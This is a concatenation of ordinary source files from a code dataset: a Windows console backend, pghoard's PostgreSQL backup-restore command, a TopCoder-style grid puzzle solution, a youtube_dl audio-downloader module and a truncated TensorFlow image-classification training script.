self.mpos[1],\n True if btn & 1 == 1 else False,\n True if btn & 4 == 4 else False,\n True if btn & 2 == 2 else False,\n scroll\n )\n\n def clear(self):\n self.buffer.FillConsoleOutputCharacter(' ', self.w * self.h,\n PyCOORDType(0, 0))\n\n def write(self, x, y, txt):\n self.buffer.WriteConsoleOutputCharacter(txt, PyCOORDType(x, y))\n\n def refresh(self):\n for y in range(self.matrix.h):\n chars = self.matrix.chars[y]\n changes = self.matrix.changes[y]\n\n for x in range(self.matrix.w):\n if changes[x]:\n c = chars[x]\n self.buffer.WriteConsoleOutputCharacter(\n '.' if c is None else c, PyCOORDType(x, y))\n changes[x] = False\n\n","repo_name":"lannocc/appscii","sub_path":"appscii/backend/win32.py","file_name":"win32.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"6079282926","text":"from . 
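In `Application.inputs()` above, wheel direction is recovered by masking `ButtonState`: the high word of the value carries the signed wheel delta, so a negative delta surfaces as `0xFF88....` A small sketch of just that test, reusing the same constants (the helper name is hypothetical):

```python
# Hypothetical helper mirroring the scroll-direction test in Application.inputs().
# The magic numbers come from the code above: 4287102976 == 0xFF880000 and
# 7864320 == 0x00780000; the high word of ButtonState holds the wheel delta.
def scroll_direction(button_state: int) -> int:
    if button_state & 4287102976 == 4287102976:  # negative delta: wheel down
        return -1
    if button_state & 7864320 == 7864320:        # positive delta: wheel up
        return 1
    return 0

assert scroll_direction(0xFF880000) == -1
assert scroll_direction(0x00780000) == 1
assert scroll_direction(0x00000001) == 0  # plain left-button press: no scroll
```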
import common, config, logutil, version\nfrom .patchedtarfile import tarfile\nfrom .postgres_command import PGHOARD_HOST, PGHOARD_PORT\nfrom concurrent import futures\n# ignore pylint/distutils issue, https://github.com/PyCQA/pylint/issues/73\nfrom distutils.version import LooseVersion # pylint: disable=no-name-in-module,import-error\nfrom pghoard.rohmu import compat, dates, get_transfer, IO_BLOCK_SIZE, rohmufile\nfrom pghoard.rohmu.errors import Error, InvalidConfigurationError\nfrom psycopg2.extensions import adapt\nfrom requests import Session\nimport argparse\nimport datetime\nimport io\nimport logging\nimport os\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport time\n\n\nclass RestoreError(Error):\n \"\"\"Restore error\"\"\"\n\n\ndef create_recovery_conf(dirpath, site, *,\n port=PGHOARD_PORT,\n primary_conninfo=None,\n recovery_end_command=None,\n recovery_target_action=None,\n recovery_target_name=None,\n recovery_target_time=None,\n recovery_target_xid=None,\n restore_to_master=None):\n restore_command = [\n \"pghoard_postgres_command\",\n \"--mode\", \"restore\",\n \"--port\", str(port),\n \"--site\", site,\n \"--output\", \"%p\",\n \"--xlog\", \"%f\",\n ]\n lines = [\n \"# pghoard created recovery.conf\",\n \"recovery_target_timeline = 'latest'\",\n \"trigger_file = {}\".format(adapt(os.path.join(dirpath, \"trigger_file\"))),\n \"restore_command = '{}'\".format(\" \".join(restore_command)),\n ]\n if not restore_to_master:\n lines.append(\"standby_mode = 'on'\")\n if primary_conninfo:\n lines.append(\"primary_conninfo = {}\".format(adapt(primary_conninfo)))\n if recovery_end_command:\n lines.append(\"recovery_end_command = {}\".format(adapt(recovery_end_command)))\n if recovery_target_action:\n with open(os.path.join(dirpath, \"PG_VERSION\"), \"r\") as fp:\n pg_version = fp.read().strip()\n if LooseVersion(pg_version) >= \"9.5\":\n lines.append(\"recovery_target_action = '{}'\".format(recovery_target_action))\n elif recovery_target_action == \"promote\":\n pass # default action\n elif recovery_target_action == \"pause\":\n lines.append(\"pause_at_recovery_target = True\")\n else:\n print(\"Unsupported recovery_target_action {!r} for PostgreSQL {}, ignoring\".format(\n recovery_target_action, pg_version))\n if recovery_target_name:\n lines.append(\"recovery_target_name = '{}'\".format(recovery_target_name))\n if recovery_target_time:\n lines.append(\"recovery_target_time = '{}'\".format(recovery_target_time))\n if recovery_target_xid:\n lines.append(\"recovery_target_xid = '{}'\".format(recovery_target_xid))\n content = \"\\n\".join(lines) + \"\\n\"\n filepath = os.path.join(dirpath, \"recovery.conf\")\n filepath_tmp = filepath + \".tmp\"\n with open(filepath_tmp, \"w\") as fp:\n fp.write(content)\n os.rename(filepath_tmp, filepath)\n return content\n\n\ndef print_basebackup_list(basebackups, *, caption=\"Available basebackups\", verbose=True):\n print(caption, \"\\n\")\n fmt = \"{name:40} {size:>11} {orig_size:>11} {time:20}\".format\n print(fmt(name=\"Basebackup\", size=\"Backup size\", time=\"Start time\", orig_size=\"Orig size\"))\n print(fmt(name=\"-\" * 40, size=\"-\" * 11, time=\"-\" * 20, orig_size=\"-\" * 11))\n for b in sorted(basebackups, key=lambda b: b[\"name\"]):\n meta = b[\"metadata\"].copy()\n lm = meta.pop(\"start-time\")\n if isinstance(lm, str):\n lm = dates.parse_timestamp(lm)\n if lm.tzinfo:\n lm = lm.astimezone(datetime.timezone.utc).replace(tzinfo=None)\n lm_str = lm.isoformat()[:19] + \"Z\" # # pylint: disable=no-member\n size_str = \"{} 
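A hypothetical call to `create_recovery_conf()` could look like the following; the data directory, site name and conninfo are invented, and `dirpath` must already exist because `recovery.conf` is written into it:

```python
# Hypothetical invocation of create_recovery_conf() as defined above.
content = create_recovery_conf(
    "/var/lib/postgresql/restore",   # dirpath: must exist and be writable
    "example-site",
    primary_conninfo="host=10.0.0.1 port=5432 user=replicator",
    recovery_target_time="2021-06-01 12:00:00",
)
print(content.splitlines()[0])  # -> "# pghoard created recovery.conf"
```

The function writes to `recovery.conf.tmp` first and then `os.rename()`s it into place, so readers never observe a half-written file.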
MB\".format(b[\"size\"] // (1024 ** 2))\n orig_size = int(meta.pop(\"original-file-size\", 0) or 0)\n if orig_size:\n orig_size_str = \"{} MB\".format(orig_size // (1024 ** 2))\n else:\n orig_size_str = \"n/a\"\n print(fmt(name=b[\"name\"], size=size_str, time=lm_str, orig_size=orig_size_str))\n if verbose:\n print(\" metadata:\", meta)\n\n\nclass Restore:\n log_tracebacks = False\n\n def __init__(self):\n self.config = None\n self.log = logging.getLogger(\"PGHoardRestore\")\n self.storage = None\n\n def create_parser(self):\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-D\", \"--debug\", help=\"Enable debug logging\", action=\"store_true\")\n parser.add_argument(\"--version\", action='version', help=\"show program version\",\n version=version.__version__)\n sub = parser.add_subparsers(help=\"sub-command help\")\n\n def add_cmd(method):\n cp = sub.add_parser(method.__name__.replace(\"_\", \"-\"), help=method.__doc__)\n cp.set_defaults(func=method)\n return cp\n\n def generic_args(require_config=True, require_site=False):\n config_path = os.environ.get(\"PGHOARD_CONFIG\")\n cmd.add_argument(\"-v\", \"--verbose\", help=\"verbose output\", action=\"store_true\")\n if config_path:\n cmd.add_argument(\"--config\", help=\"pghoard config file\", default=config_path)\n else:\n cmd.add_argument(\"--config\", help=\"pghoard config file\", required=require_config)\n\n cmd.add_argument(\"--site\", help=\"pghoard site\", required=require_site)\n\n def host_port_args():\n cmd.add_argument(\"--host\", help=\"pghoard repository host\", default=PGHOARD_HOST)\n cmd.add_argument(\"--port\", help=\"pghoard repository port\", default=PGHOARD_PORT)\n\n def target_args():\n cmd.add_argument(\"--basebackup\", help=\"pghoard basebackup\", default=\"latest\")\n cmd.add_argument(\"--primary-conninfo\", help=\"replication.conf primary_conninfo\", default=\"\")\n cmd.add_argument(\"--target-dir\", help=\"pghoard restore target 'pgdata' dir\", required=True)\n cmd.add_argument(\"--overwrite\", help=\"overwrite existing target directory\",\n default=False, action=\"store_true\")\n cmd.add_argument(\"--tablespace-dir\", metavar=\"NAME=DIRECTORY\", action=\"append\",\n help=\"map the given tablespace to an existing empty directory; \"\n \"this option can be used multiple times to map multiple tablespaces\")\n cmd.add_argument(\"--recovery-end-command\", help=\"PostgreSQL recovery_end_command\", metavar=\"COMMAND\")\n cmd.add_argument(\"--recovery-target-action\", help=\"PostgreSQL recovery_target_action\",\n choices=[\"pause\", \"promote\", \"shutdown\"])\n cmd.add_argument(\"--recovery-target-name\", help=\"PostgreSQL recovery_target_name\", metavar=\"RESTOREPOINT\")\n cmd.add_argument(\"--recovery-target-time\", help=\"PostgreSQL recovery_target_time\", metavar=\"ISO_TIMESTAMP\")\n cmd.add_argument(\"--recovery-target-xid\", help=\"PostgreSQL recovery_target_xid\", metavar=\"XID\")\n cmd.add_argument(\"--restore-to-master\", help=\"Restore the database to a PG master\", action=\"store_true\")\n\n cmd = add_cmd(self.list_basebackups_http)\n host_port_args()\n generic_args(require_config=False, require_site=True)\n\n cmd = add_cmd(self.list_basebackups)\n generic_args()\n\n cmd = add_cmd(self.get_basebackup)\n target_args()\n generic_args()\n\n return parser\n\n def list_basebackups_http(self, arg):\n \"\"\"List available basebackups from a HTTP source\"\"\"\n self.storage = HTTPRestore(arg.host, arg.port, arg.site)\n self.storage.show_basebackup_list(verbose=arg.verbose)\n\n def _get_object_storage(self, 
site, pgdata):\n storage_config = common.get_object_storage_config(self.config, site)\n storage = get_transfer(storage_config)\n return ObjectStore(storage, self.config[\"backup_sites\"][site][\"prefix\"], site, pgdata)\n\n def list_basebackups(self, arg):\n \"\"\"List basebackups from an object store\"\"\"\n self.config = config.read_json_config_file(arg.config, check_commands=False, check_pgdata=False)\n site = config.get_site_from_config(self.config, arg.site)\n self.storage = self._get_object_storage(site, pgdata=None)\n self.storage.show_basebackup_list(verbose=arg.verbose)\n\n def get_basebackup(self, arg):\n \"\"\"Download a basebackup from an object store\"\"\"\n if not arg.tablespace_dir:\n tablespace_mapping = {}\n else:\n try:\n tablespace_mapping = dict(v.split(\"=\", 1) for v in arg.tablespace_dir)\n except ValueError:\n raise RestoreError(\"Invalid tablespace mapping {!r}\".format(arg.tablespace_dir))\n\n self.config = config.read_json_config_file(arg.config, check_commands=False, check_pgdata=False)\n site = config.get_site_from_config(self.config, arg.site)\n try:\n self.storage = self._get_object_storage(site, arg.target_dir)\n self._get_basebackup(\n pgdata=arg.target_dir,\n basebackup=arg.basebackup,\n site=site,\n primary_conninfo=arg.primary_conninfo,\n recovery_end_command=arg.recovery_end_command,\n recovery_target_action=arg.recovery_target_action,\n recovery_target_name=arg.recovery_target_name,\n recovery_target_time=arg.recovery_target_time,\n recovery_target_xid=arg.recovery_target_xid,\n restore_to_master=arg.restore_to_master,\n overwrite=arg.overwrite,\n tablespace_mapping=tablespace_mapping,\n )\n except RestoreError:\n raise\n except Exception as ex:\n if self.log_tracebacks:\n self.log.exception(\"Unexpected _get_basebackup failure\")\n raise RestoreError(\"{}: {}\".format(ex.__class__.__name__, ex))\n\n def _find_nearest_basebackup(self, recovery_target_time=None):\n applicable_basebackups = []\n\n basebackups = self.storage.list_basebackups()\n for basebackup in basebackups:\n if recovery_target_time:\n # We really need the backup end time here, but pg_basebackup based backup methods don't provide\n # it for us currently, so fall back to using start-time.\n if \"end-time\" in basebackup[\"metadata\"]:\n backup_ts = dates.parse_timestamp(basebackup[\"metadata\"][\"end-time\"])\n else:\n backup_ts = dates.parse_timestamp(basebackup[\"metadata\"][\"start-time\"])\n if backup_ts >= recovery_target_time:\n continue\n applicable_basebackups.append(basebackup)\n\n if not applicable_basebackups:\n raise RestoreError(\"No applicable basebackups found, exiting\")\n\n # NOTE: as above, we may not have end-time so just sort by start-time, the order should be the same\n applicable_basebackups.sort(key=lambda basebackup: basebackup[\"metadata\"][\"start-time\"])\n caption = \"Found {} applicable basebackup{}\".format(\n len(applicable_basebackups),\n \"\" if len(applicable_basebackups) == 1 else \"s\")\n print_basebackup_list(applicable_basebackups, caption=caption)\n\n selected = applicable_basebackups[-1][\"name\"]\n print(\"\\nSelecting {!r} for restore\".format(selected))\n return selected\n\n def _extract_pghoard_bb_v1_v2(self, fileobj, pgdata, tablespaces):\n directories = []\n # | in mode to use tarfile's internal stream buffer manager, currently required because our SnappyFile\n # interface doesn't do proper buffering for reads\n with tarfile.open(fileobj=fileobj, mode=\"r|\", bufsize=IO_BLOCK_SIZE) as tar:\n for tarinfo in tar:\n if tarinfo.name in 
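The selection rule in `_find_nearest_basebackup()` reduces to: drop every backup whose (end or start) timestamp is at or after the recovery target, sort the survivors by start time, and take the newest. A toy model with made-up backups:

```python
from datetime import datetime

# Reduced model of _find_nearest_basebackup(); the backup data is made up.
backups = [
    {"name": "base-a", "metadata": {"start-time": datetime(2021, 1, 1)}},
    {"name": "base-b", "metadata": {"start-time": datetime(2021, 2, 1)}},
    {"name": "base-c", "metadata": {"start-time": datetime(2021, 3, 1)}},
]
target = datetime(2021, 2, 15)

applicable = [b for b in backups if b["metadata"]["start-time"] < target]
applicable.sort(key=lambda b: b["metadata"]["start-time"])
print(applicable[-1]["name"])  # -> base-b, the newest backup before the target
```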
(\".pghoard_tar_metadata.json\", \"pgdata\", \"tablespaces\"):\n continue # ignore\n\n if tarinfo.name.startswith(\"pgdata/\"):\n target_name = os.path.join(pgdata, tarinfo.name[7:])\n elif tarinfo.name.startswith(\"tablespaces/\"):\n tscomponents = tarinfo.name.split(\"/\", 2)\n tsname = tscomponents[1]\n tspath = tablespaces[tsname][\"path\"]\n\n if len(tscomponents) == 2 and tarinfo.isdir():\n # Create tablespace entry\n tblspc_dir = os.path.join(pgdata, \"pg_tblspc\")\n os.makedirs(tblspc_dir, exist_ok=True)\n linkname = os.path.join(pgdata, \"pg_tblspc\", str(tablespaces[tsname][\"oid\"]))\n os.symlink(tspath, linkname)\n directories.append([tspath, tarinfo])\n continue\n\n target_name = os.path.join(tspath, tscomponents[2])\n else:\n raise Exception(\"Unrecognized path {!r} in tar\".format(tarinfo.name))\n\n if tarinfo.isdir():\n directories.append([target_name, tarinfo])\n compat.makedirs(target_name, exist_ok=True)\n elif tarinfo.isreg():\n target_dir = os.path.dirname(target_name)\n if not os.path.exists(target_dir):\n compat.makedirs(target_dir, exist_ok=True)\n tar.makefile(tarinfo, target_name)\n tar.chmod(tarinfo, target_name)\n tar.utime(tarinfo, target_name)\n elif tarinfo.issym():\n os.symlink(tarinfo.linkname, target_name)\n else:\n raise Exception(\"Unrecognized file type for file {!r} in tar\".format(tarinfo.name))\n\n for target_name, tarinfo in directories:\n tar.chmod(tarinfo, target_name)\n tar.utime(tarinfo, target_name)\n\n def _extract_basic(self, fileobj, pgdata):\n # | in mode to use tarfile's internal stream buffer manager, currently required because our SnappyFile\n # interface doesn't do proper buffering for reads\n with tarfile.open(fileobj=fileobj, mode=\"r|\", bufsize=IO_BLOCK_SIZE) as tar:\n tar.extractall(pgdata)\n\n def _get_basebackup(self, pgdata, basebackup, site,\n primary_conninfo=None,\n recovery_end_command=None,\n recovery_target_action=None,\n recovery_target_name=None,\n recovery_target_time=None,\n recovery_target_xid=None,\n restore_to_master=None,\n overwrite=False,\n tablespace_mapping=None):\n targets = [recovery_target_name, recovery_target_time, recovery_target_xid]\n if sum(0 if flag is None else 1 for flag in targets) > 1:\n raise RestoreError(\"Specify at most one of recovery_target_name, \"\n \"recovery_target_time or recovery_target_xid\")\n\n # If basebackup that we want it set as latest, figure out which one it is\n if recovery_target_time:\n try:\n recovery_target_time = dates.parse_timestamp(recovery_target_time)\n except (TypeError, ValueError) as ex:\n raise RestoreError(\"recovery_target_time {!r}: {}\".format(recovery_target_time, ex))\n basebackup = self._find_nearest_basebackup(recovery_target_time)\n elif basebackup == \"latest\":\n basebackup = self._find_nearest_basebackup()\n\n # Grab basebackup metadata to make sure it exists and to look up tablespace requirements\n metadata = self.storage.get_basebackup_metadata(basebackup)\n tablespaces = {}\n\n # Make sure we have a proper place to write the $PGDATA and possible tablespaces\n dirs_to_create = []\n dirs_to_recheck = []\n dirs_to_wipe = []\n\n if not os.path.exists(pgdata):\n dirs_to_create.append(pgdata)\n elif overwrite:\n dirs_to_create.append(pgdata)\n dirs_to_wipe.append(pgdata)\n elif os.listdir(pgdata) in ([], [\"lost+found\"]):\n # Allow empty directories as well as ext3/4 mount points to be used, but check that we can write to them\n dirs_to_recheck.append([\"$PGDATA\", pgdata])\n else:\n raise RestoreError(\"$PGDATA target directory {!r} exists, is not 
empty and --overwrite not specified, aborting.\"\n .format(pgdata))\n\n if metadata.get(\"format\") == \"pghoard-bb-v2\":\n # \"Backup file\" is a metadata object, fetch it to get more information\n bmeta_compressed = self.storage.get_file_bytes(basebackup)\n with rohmufile.file_reader(fileobj=io.BytesIO(bmeta_compressed), metadata=metadata,\n key_lookup=config.key_lookup_for_site(self.config, site)) as input_obj:\n bmeta = common.extract_pghoard_bb_v2_metadata(input_obj)\n self.log.debug(\"Backup metadata: %r\", bmeta)\n\n tablespaces = bmeta[\"tablespaces\"]\n basebackup_data_files = [\n [\n os.path.join(self.config[\"backup_sites\"][site][\"prefix\"], \"basebackup_chunk\", chunk[\"chunk_filename\"]),\n chunk[\"result_size\"],\n ]\n for chunk in bmeta[\"chunks\"]\n ]\n # We need the files from the main basebackup file too\n basebackup_data_files.append([(io.BytesIO(bmeta_compressed), metadata), 0])\n\n elif metadata.get(\"format\") == \"pghoard-bb-v1\":\n # Tablespace information stored in object store metadata, look it up\n tsmetare = re.compile(\"^tablespace-name-([0-9]+)$\")\n for kw, value in metadata.items():\n match = tsmetare.match(kw)\n if not match:\n continue\n tsoid = match.group(1)\n tsname = value\n tspath = metadata[\"tablespace-path-{}\".format(tsoid)]\n tablespaces[tsname] = {\n \"oid\": int(tsoid),\n \"path\": tspath,\n }\n\n basebackup_data_files = [[basebackup, -1]]\n\n else:\n # Object is a raw (encrypted, compressed) basebackup\n basebackup_data_files = [[basebackup, -1]]\n\n # Map tablespaces as requested and make sure the directories exist\n for tsname, tsinfo in tablespaces.items():\n tspath = tablespace_mapping.pop(tsname, tsinfo[\"path\"])\n if not os.path.exists(tspath):\n raise RestoreError(\"Tablespace {!r} target directory {!r} does not exist, aborting.\"\n .format(tsname, tspath))\n if os.listdir(tspath) not in ([], [\"lost+found\"]):\n # Allow empty directories as well as ext3/4 mount points to be used, but check that we can write to them\n raise RestoreError(\"Tablespace {!r} target directory {!r} exists but is not empty, aborting.\"\n .format(tsname, tspath))\n\n tsinfo[\"path\"] = tspath\n print(\"Using existing empty directory {!r} for tablespace {!r}\".format(tspath, tsname))\n dirs_to_recheck.append([\"Tablespace {!r}\".format(tsname), tspath])\n\n # We .pop() the elements of tablespace_mapping above - if mappings are given they must all exist or the\n # user probably made a typo with tablespace names, abort in that case.\n if tablespace_mapping:\n raise RestoreError(\"Tablespace mapping for {} was requested, but the tablespaces are not present in the backup\"\n .format(sorted(tablespace_mapping)))\n\n # First check that the existing (empty) directories are writable, then possibly wipe any directories as\n # requested by --overwrite and finally create the new dirs\n for diruse, dirname in dirs_to_recheck:\n try:\n tempfile.TemporaryFile(dir=dirname).close()\n except PermissionError:\n raise RestoreError(\"{} target directory {!r} is empty, but not writable, aborting.\"\n .format(diruse, dirname))\n\n for dirname in dirs_to_wipe:\n shutil.rmtree(dirname)\n for dirname in dirs_to_create:\n os.makedirs(dirname)\n os.chmod(dirname, 0o700)\n\n total_download_size = sum(item[1] for item in basebackup_data_files)\n progress_report_time = [0]\n errors = 0\n jobs = []\n with futures.ThreadPoolExecutor(max_workers=self.config[\"transfer\"][\"thread_count\"]) as executor:\n download_progress_per_file = {\n basebackup_data_file: 0\n for basebackup_data_file, _ 
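For the `pghoard-bb-v1` format, tablespaces live in flat metadata keys (`tablespace-name-<oid>` / `tablespace-path-<oid>`). A sketch of that lookup with invented metadata:

```python
import re

# Sketch of the pghoard-bb-v1 tablespace lookup above; metadata is made up.
metadata = {
    "tablespace-name-16385": "tsdata",
    "tablespace-path-16385": "/mnt/ts/tsdata",
    "format": "pghoard-bb-v1",
}
tsmetare = re.compile(r"^tablespace-name-([0-9]+)$")
tablespaces = {}
for kw, value in metadata.items():
    match = tsmetare.match(kw)
    if match:
        tsoid = match.group(1)
        tablespaces[value] = {
            "oid": int(tsoid),
            "path": metadata["tablespace-path-{}".format(tsoid)],
        }
print(tablespaces)  # {'tsdata': {'oid': 16385, 'path': '/mnt/ts/tsdata'}}
```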
in basebackup_data_files\n if not isinstance(basebackup_data_file, tuple)\n }\n\n def download_progress(end=\"\"):\n # report max once per second\n if time.monotonic() - progress_report_time[0] < 1:\n return\n progress_report_time[0] = time.monotonic()\n\n total_downloaded = sum(download_progress_per_file.values())\n if total_download_size <= 0:\n progress = 0\n else:\n progress = total_downloaded / total_download_size\n print(\"\\rDownload progress: {progress:.2%} ({dl_mib:.0f} / {total_mib:.0f} MiB)\\r\".format(\n progress=progress,\n dl_mib=total_downloaded / (1024 ** 2),\n total_mib=total_download_size / (1024 ** 2),\n ), end=end)\n\n for basebackup_data_file, backup_data_file_size in basebackup_data_files:\n def single_download_progress(current_pos, expected_max,\n this_file_name=basebackup_data_file,\n this_file_size=backup_data_file_size):\n download_progress_per_file[this_file_name] = this_file_size * (current_pos / expected_max)\n download_progress()\n\n # NOTE: Most of the transfer clients aren't thread-safe, so initialize a new transfer\n # client for each download. We could use thread local storage or pooling here, but\n # probably not worth the trouble for this use case.\n transfer = get_transfer(common.get_object_storage_config(self.config, site))\n jobs.append(executor.submit(\n self.process_one_chunk,\n basebackup_data_file=basebackup_data_file,\n progress_callback=single_download_progress,\n site=site,\n transfer=transfer,\n pgdata=pgdata,\n tablespaces=tablespaces,\n ))\n\n for future in futures.as_completed(jobs):\n if future.exception():\n self.log.error(\"Got error from chunk download: %s\", future.exception())\n errors += 1\n continue\n\n progress_report_time[0] = 0\n download_progress(end=\"\\n\")\n\n if errors:\n raise RestoreError(\"Backup download/extraction failed with {} errors\".format(errors))\n\n create_recovery_conf(\n dirpath=pgdata,\n site=site,\n port=self.config[\"http_port\"],\n primary_conninfo=primary_conninfo,\n recovery_end_command=recovery_end_command,\n recovery_target_action=recovery_target_action,\n recovery_target_name=recovery_target_name,\n recovery_target_time=recovery_target_time,\n recovery_target_xid=recovery_target_xid,\n restore_to_master=restore_to_master,\n )\n\n print(\"Basebackup restoration complete.\")\n print(\"You can start PostgreSQL by running pg_ctl -D %s start\" % pgdata)\n print(\"On systemd based systems you can run systemctl start postgresql\")\n print(\"On SYSV Init based systems you can run /etc/init.d/postgresql start\")\n\n def process_one_chunk(self, *, transfer, basebackup_data_file, progress_callback, site, pgdata, tablespaces):\n self.log.debug(\"Processing one chunk: %r\", basebackup_data_file)\n if isinstance(basebackup_data_file, tuple):\n tmp, metadata = basebackup_data_file\n else:\n tmp, metadata = self.download_one_backup(\n transfer=transfer,\n basebackup_data_file=basebackup_data_file,\n progress_callback=progress_callback,\n site=site\n )\n\n self.extract_one_backup(\n obj=tmp,\n metadata=metadata,\n pgdata=pgdata,\n site=site,\n tablespaces=tablespaces,\n )\n\n def download_one_backup(self, *, transfer, basebackup_data_file, progress_callback, site):\n dl_dir = os.path.join(\n self.config[\"backup_location\"],\n self.config[\"backup_sites\"][site][\"prefix\"],\n \"basebackup_incoming\",\n )\n compat.makedirs(dl_dir, exist_ok=True)\n tmp = tempfile.NamedTemporaryFile(dir=dl_dir, prefix=\"basebackup.\", suffix=\".pghoard\")\n try:\n metadata = transfer.get_contents_to_fileobj(\n 
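The chunk downloads follow the usual submit-then-`as_completed` fan-out, counting failures instead of aborting on the first one. The same skeleton in miniature, with a stand-in worker and made-up chunk names:

```python
from concurrent import futures

# Miniature of the download fan-out above; fetch() is a stand-in worker.
def fetch(chunk):
    if chunk == "bad":
        raise IOError("download failed")
    return len(chunk)

jobs = []
errors = 0
with futures.ThreadPoolExecutor(max_workers=4) as executor:
    for chunk in ["aaa", "bb", "bad", "cccc"]:
        jobs.append(executor.submit(fetch, chunk))
    for future in futures.as_completed(jobs):
        if future.exception():
            errors += 1
        else:
            print(future.result())  # 3, 2, 4 in completion order
print("errors:", errors)  # -> errors: 1
```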
key=basebackup_data_file,\n fileobj_to_store_to=tmp,\n progress_callback=progress_callback)\n progress_callback(1, 1)\n self.log.info(\"Downloaded %r\", basebackup_data_file)\n tmp.seek(0)\n except: # pylint: disable=bare-except\n self.log.exception(\"Problem downloading a backup file: %r\", basebackup_data_file)\n tmp.close()\n raise\n return tmp, metadata\n\n def extract_one_backup(self, *, obj, metadata, pgdata, site, tablespaces):\n with obj:\n with rohmufile.file_reader(fileobj=obj, metadata=metadata,\n key_lookup=config.key_lookup_for_site(self.config, site)) as input_obj:\n if metadata.get(\"format\") in (\"pghoard-bb-v1\", \"pghoard-bb-v2\"):\n self._extract_pghoard_bb_v1_v2(input_obj, pgdata, tablespaces)\n elif not metadata.get(\"format\"):\n self._extract_basic(input_obj, pgdata)\n else:\n raise RestoreError(\"Unrecognized basebackup format {!r}\".format(metadata.get(\"format\")))\n self.log.info(\"Extracted %r %r\", obj, metadata)\n\n def run(self, args=None):\n parser = self.create_parser()\n args = parser.parse_args(args)\n logutil.configure_logging(level=logging.DEBUG if args.debug else logging.INFO)\n if not hasattr(args, \"func\"):\n parser.print_help()\n return 1\n try:\n exit_code = args.func(args)\n return exit_code\n except KeyboardInterrupt:\n print(\"*** interrupted by keyboard ***\")\n return 1\n\n\nclass ObjectStore:\n def __init__(self, storage, prefix, site, pgdata):\n self.storage = storage\n self.prefix = prefix\n self.site = site\n self.pgdata = pgdata\n self.log = logging.getLogger(self.__class__.__name__)\n\n def list_basebackups(self):\n return self.storage.list_path(os.path.join(self.prefix, \"basebackup\"))\n\n def show_basebackup_list(self, verbose=True):\n result = self.list_basebackups()\n caption = \"Available %r basebackups:\" % self.site\n print_basebackup_list(result, caption=caption, verbose=verbose)\n\n def get_basebackup_metadata(self, basebackup):\n return self.storage.get_metadata_for_key(basebackup)\n\n def get_basebackup_file_to_fileobj(self, basebackup, fileobj, *, progress_callback=None):\n return self.storage.get_contents_to_fileobj(basebackup, fileobj, progress_callback=progress_callback)\n\n def get_file_bytes(self, name):\n return self.storage.get_contents_to_string(name)[0]\n\n\nclass HTTPRestore(ObjectStore):\n def __init__(self, host, port, site, pgdata=None):\n super().__init__(storage=None, prefix=None, site=site, pgdata=pgdata)\n self.host = host\n self.port = port\n self.session = Session()\n\n def _url(self, path):\n return \"http://{host}:{port}/{site}/{path}\".format(\n host=self.host,\n port=self.port,\n site=self.site,\n path=path)\n\n def list_basebackups(self):\n response = self.session.get(self._url(\"basebackup\"))\n return response.json()[\"basebackups\"]\n\n\ndef main():\n try:\n restore = Restore()\n return restore.run()\n except (InvalidConfigurationError, RestoreError) as ex:\n print(\"FATAL: {}: {}\".format(ex.__class__.__name__, ex))\n return 1\n\n\nif __name__ == \"__main__\":\n sys.exit(main() or 0)\n","repo_name":"Clarivate-LSPS/pghoard","sub_path":"pghoard/restore.py","file_name":"restore.py","file_ext":"py","file_size_in_byte":29200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"20136276044","text":"from problem_utils import *\n\nclass TaroGrid:\n def getNumber(self, grid):\n input_array = grid\n # Cat Taro has a square grid with N rows and N columns.\n # Each cell of the grid is painted either black or white.\n # You are given a String[] grid which 
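End to end, a restore driven through `Restore.run()` would look roughly like this; the config path, site and target directory are made up, and a real invocation talks to the configured object store:

```python
# Hypothetical end-to-end restore via Restore.run(); the sub-command and
# flags match the parser defined above, the paths and site are invented.
restore = Restore()
exit_code = restore.run([
    "get-basebackup",
    "--config", "/etc/pghoard/pghoard.json",
    "--site", "default",
    "--target-dir", "/var/lib/postgresql/restore",
    "--overwrite",
])
```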
represents the current state of the grid.\n        # Each element of grid represents one row of the grid.\n        # In grid, the character 'W' represents a white cell, and the character 'B' represents a black cell.\n        # Taro wants to choose a set of consecutive cells that are in the same column and are painted in the same color.\n        # ROOT-0(root=wants-2(nsubj=Taro-1, xcomp=choose-4(aux=to-3, dobj=set-6(det=a-5, prep_of=cells-9(amod=consecutive-8), rcmod=are-11(nsubj=that-10, prep_in=column-15(det=the-13, amod=same-14)))), conj_and=painted-18(auxpass=are-17, prep_in=color-22(det=the-20, amod=same-21))))\n        # Return the largest number of cells he can choose.\n        # ROOT-0(root=choose-9(dep=Return-1(dobj=number-4(det=the-2, amod=largest-3, prep_of=cells-6)), nsubj=he-7, aux=can-8))\n        # Scan each column for its longest run of consecutive equally-colored cells.\n        best = 0\n        for col in range(len(input_array)):\n            run = 0\n            prev = None\n            for row in range(len(input_array)):\n                run = run + 1 if input_array[row][col] == prev else 1\n                prev = input_array[row][col]\n                best = max(best, run)\n        return best\n\n\n\ndef example0():\n\tcls = TaroGrid()\n\tinput0 = [\"W\"]\n\treturns = 1\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example1():\n\tcls = TaroGrid()\n\tinput0 = [\"WB\", \"BW\"]\n\treturns = 1\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example2():\n\tcls = TaroGrid()\n\tinput0 = [\"BWW\", \"BBB\", \"BWB\"]\n\treturns = 3\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example3():\n\tcls = TaroGrid()\n\tinput0 = [\"BWBW\", \"BBWB\", \"WWWB\", \"BWWW\"]\n\treturns = 3\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example4():\n\tcls = TaroGrid()\n\tinput0 = [\"BWB\", \"BBW\", \"BWB\"]\n\treturns = 3\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\ndef example5():\n\tcls = TaroGrid()\n\tinput0 = [\"BBWWBBWW\", \"BBWWBBWW\", \"WWBBWWBB\", \"WWBBWWBB\", \"BBWWBBWW\", \"BBWWBBWW\", \"WWBBWWBB\", \"WWBBWWBB\"]\n\treturns = 2\n\tresult = cls.getNumber(input0)\n\treturn result == returns\n\n\n\nif __name__ == 